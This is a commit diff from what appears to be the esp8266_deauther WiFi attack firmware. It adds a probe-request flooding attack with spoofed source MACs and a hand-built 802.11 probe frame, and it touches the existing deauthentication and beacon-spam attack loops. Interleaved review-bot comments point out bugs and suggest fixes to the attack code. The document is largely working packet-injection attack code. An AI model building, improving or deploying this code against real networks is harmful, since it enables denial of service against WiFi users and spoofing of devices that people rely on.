
Commit 141c9f1

author
Stefan Kremser
committed
Added Probe Request Attack
1 parent 42058cf commit 141c9f1

5 files changed

+94
-26
lines changed

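--- a/esp8266_deauther/Attack.cpp
+++ b/esp8266_deauther/Attack.cpp
@@ -5,7 +5,7 @@ Attack::Attack(){
 }
 
 void Attack::generate(){
-if(debug) Serial.print("generating Macs...");
+if(debug) Serial.print("\n generating Macs...");
 
 Mac _randomBeaconMac;
 uint8_t _randomMacBuffer[6];
@@ -80,6 +80,24 @@ void Attack::buildBeacon(Mac _ap, String _ssid, int _ch, bool encrypt){
 
 }
 
+void Attack::buildProbe(String _ssid, Mac _mac){
+int len = _ssid.length();
+if(len > 32) len = 32;
+packetSize = 0;
+
+for(int i=0;i<sizeof(probePacket);i++) packet[packetSize+i] = probePacket[i];
+packetSize += sizeof(probePacket);
+
+for(int i=0;i<6;i++) packet[10+i] = _mac._get(i);
+
+packet[packetSize] = len;
+packetSize++;
+
+for(int i=0;i<len;i++) packet[packetSize+i] = _ssid[i];
+packetSize += len;
+
+}
+
 bool Attack::send(){
 if(wifi_send_pkt_freedom(packet, packetSize, 0) == -1){
 /*
@@ -101,7 +119,7 @@ void Attack::run(){
 
 /* =============== Deauth Attack =============== */
 if(isRunning[0] && currentMillis-prevTime[0] >= 1000){
-if(debug) Serial.print("running "+(String)attackNames[0]+" attack");
+if(debug) Serial.print("running "+(String)attackNames[0]+" attack...");
 prevTime[0] = millis();
 
 for(int a=0;a<apScan.results;a++){
@@ -150,7 +168,7 @@ void Attack::run(){
 
 /* =============== Beacon clone Attack =============== */
 if(isRunning[1] && currentMillis-prevTime[1] >= 100){
-if(debug) Serial.print("running "+(String)attackNames[1]+" attack");
+if(debug) Serial.print("running "+(String)attackNames[1]+" attack...");
 prevTime[1] = millis();
 
 for(int a=0;a<apScan.results;a++){
@@ -193,7 +211,7 @@ void Attack::run(){
 generate();
 macListChangeCounter = 0;
 }
-if(debug) Serial.println(" done ");
+if(debug) Serial.println(" done");
 if(settings.attackTimeout > 0){
 attackTimeoutCounter[1]++;
 if(attackTimeoutCounter[1]/10 > settings.attackTimeout) stop(1);
@@ -202,7 +220,7 @@ void Attack::run(){
 
 /* =============== Beacon list Attack =============== */
 if(isRunning[2] && currentMillis-prevTime[2] >= 100){
-if(debug) Serial.print("running "+(String)attackNames[2]+" attack");
+if(debug) Serial.print("running "+(String)attackNames[2]+" attack...");
 prevTime[2] = millis();
 
 for(int a=0;a<ssidList.len;a++){
@@ -216,17 +234,41 @@ void Attack::run(){
 
 stati[2] = (String)(packetsCounter[2]*10)+"pkts/s";
 packetsCounter[2] = 0;
-/*macListChangeCounter++;
+macListChangeCounter++;
 if(macListChangeCounter/10 >= macChangeInterval && macChangeInterval > 0){
 generate();
 macListChangeCounter = 0;
-}*/
-if(debug) Serial.println("done");
+}
+if(debug) Serial.println(" done");
 if(settings.attackTimeout > 0){
 attackTimeoutCounter[2]++;
 if(attackTimeoutCounter[2]/10 > settings.attackTimeout) stop(2);
 }
 }
+
+/* =============== Probe Request Attack =============== */
+if(isRunning[3] && currentMillis-prevTime[3] >= 1000){
+if(debug) Serial.print("running "+(String)attackNames[3]+" attack...");
+prevTime[3] = millis();
+
+for(int a=0;a<ssidList.len;a++){
+buildProbe(ssidList.get(a), beaconAdrs._get(a));
+if(send()) packetsCounter[3]++;
+}
+
+stati[3] = (String)(packetsCounter[3]*10)+"pkts/s";
+packetsCounter[3] = 0;
+macListChangeCounter++;
+if(macListChangeCounter >= macChangeInterval && macChangeInterval > 0){
+generate();
+macListChangeCounter = 0;
+}
+if(debug) Serial.println("done");
+if(settings.attackTimeout > 0){
+attackTimeoutCounter[3]++;
+if(attackTimeoutCounter[3] > settings.attackTimeout) stop(3);
+}
+}
 
 }
 
@@ -239,15 +281,23 @@ void Attack::start(int num){
 prevTime[num] = millis();
 attackTimeoutCounter[num] = 0;
 refreshLed();
-if(debug) Serial.println("starting "+(String)attackNames[num]+" attack");
-if(num == 1 && isRunning[2]) stop(2);
-else if(num == 2 && isRunning[1]) stop(1);
+if(debug) Serial.println("starting "+(String)attackNames[num]+" attack...");
+if(num == 1){
+stop(2);
+stop(3);
+} else if(num == 2){
+stop(1);
+stop(3);
+} else if(num == 3){
+stop(1);
+stop(2);
+}
 }else stop(num);
 }
 
 void Attack::stop(int num){
 if(isRunning[num]){
-if(debug) Serial.println("stopping "+(String)attackNames[num]+" attack");
+if(debug) Serial.println("stopping "+(String)attackNames[num]+" attack...");
 isRunning[num] = false;
 stati[num] = "ready";
 prevTime[num] = millis();
@@ -265,7 +315,7 @@ String Attack::getResults(){
 for(int i=0;i<attacksNum;i++) if(!isRunning[i]) stati[i] = "ready";
 
 if(apScan.getFirstTarget() < 0) stati[0] = stati[1] = "no AP";
-if(ssidList.len < 1) stati[2] = "no SSID";
+if(ssidList.len < 1) stati[2] = stati[3] = "no SSID";
 
 int _selected;
 String json = "{ \"aps\": [";
@@ -311,7 +361,7 @@ String Attack::getResults(){
 json += "}";
 if(debug){
 Serial.println(json);
-Serial.println("done ");
+Serial.println("done");
 }
 return json;
 }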
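Review bot: In the new Probe Request block of run(), `stati[3] = (String)(packetsCounter[3]*10)+"pkts/s";` overstates the rate tenfold: the block is gated by `currentMillis-prevTime[3] >= 1000`, so packetsCounter[3] already holds a one-second count, whereas the beacon attacks multiply by 10 because they are gated at 100 ms; `stati[3] = (String)packetsCounter[3]+"pkts/s";` reports the true figure. The same loop calls `beaconAdrs._get(a)` for every `a < ssidList.len`, and nothing in this diff shows beaconAdrs holding at least ssidList.len entries; if it is sized by macListLen the index should be bounded (for example `beaconAdrs._get(a % macListLen)`) or the relation stated in a comment. In buildProbe(), a one-line header comment such as `// fills packet[] with probePacket, the source MAC at bytes 10-15, then an SSID IE (length capped at 32)` would spare the next reader from re-deriving the layout from the offsets. run() begins outside the hunk.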

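--- a/esp8266_deauther/Attack.h
+++ b/esp8266_deauther/Attack.h
@@ -14,7 +14,7 @@ extern "C" {
 #include "Settings.h"
 #include "SSIDList.h"
 
-#define attacksNum 3
+#define attacksNum 4
 #define macListLen 64
 #define macChangeInterval 4
 
@@ -43,10 +43,11 @@ class Attack
 
 void buildDeauth(Mac _ap, Mac _client, uint8_t type, uint8_t reason);
 void buildBeacon(Mac _ap, String _ssid, int _ch, bool encrypt);
+void buildProbe(String _ssid, Mac _mac);
 bool send();
 
 //attack declarations
-const String attackNames[attacksNum] = {"deauth","beacon (clone)","beacon (list)"};
+const String attackNames[attacksNum] = {"deauth", "beacon (clone)", "beacon (list)", "probe request"};
 
 //attack infos
 String stati[attacksNum];
@@ -107,6 +108,19 @@ class Attack
 0x00, 0x00 //RSN capabilities
 };
 
+uint8_t probePacket[25] = {
+/* 0 - 1 */ 0x40, 0x00, //Type: Probe Request
+/* 2 - 3 */ 0x00, 0x00, //Duration: 0 microseconds
+/* 4 - 9 */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, //Destination: Broadcast
+/* 10 - 15 */ 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //Source: random MAC
+/* 16 - 21 */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, //BSS Id: Broadcast
+/* 22 - 23 */ 0x00, 0x00, //Sequence number (will be replaced by the SDK)
+/* 24 */ 0x00 //Tag Number: SSID parameter set (0)
+/* ,0x06, //Tag length
+0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA //SSID
+*/
+};
+
 int macListChangeCounter = 0;
 int attackTimeoutCounter[attacksNum];
 int channels[macListLen];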
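Review bot: `uint8_t probePacket[25] = {` carries a hand-counted size while buildProbe() copies `sizeof(probePacket)` bytes, so if the initializer ever falls short the array is silently zero-padded and the padding is emitted as part of the frame; `uint8_t probePacket[] = {` lets the size follow the initializer. The commented-out `/* ,0x06, … //SSID */` tail inside the initializer reads as dead code rather than documentation; a comment after the `/* 24 */` entry such as `// tag length and SSID bytes are appended per frame by buildProbe()` states the intent, and `//Source: random MAC` could say that bytes 10-15 are overwritten by buildProbe(). The class body continues outside the hunk.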
